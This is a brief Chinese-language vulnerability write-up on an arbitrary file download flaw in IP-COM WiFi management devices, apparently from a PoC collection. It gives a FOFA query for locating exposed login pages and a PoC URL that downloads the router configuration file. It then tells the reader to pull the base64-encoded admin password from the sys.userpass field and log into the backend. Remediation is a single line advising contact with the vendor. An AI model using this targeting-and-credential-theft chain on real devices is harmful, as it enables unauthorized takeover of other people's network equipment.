Nx01 产品简介

        深圳市和为顺网络技术有限公司是一家聚焦于商用级网络通信设备的研发与应用，为全球中小型企业提供高速、安全、易维护的网络设备产品和解决方案的公司。

Nx02 漏洞描述

        深圳市和为顺网络技术有限公司IP-COM WiFi方案解决专家存在任意文件下载漏洞，攻击者可利用漏洞获取敏感信息。

Nx03 产品主页

fofa-query: web.title=="IP-COM | Login"

Nx04 漏洞复现

POC：

/cgi-bin/DownloadCfg/RouterCfm.cfg

搜索sys.userpass参数获取base加密密码进行登录后台。

Nx05 修复建议

建议联系软件厂商进行处理。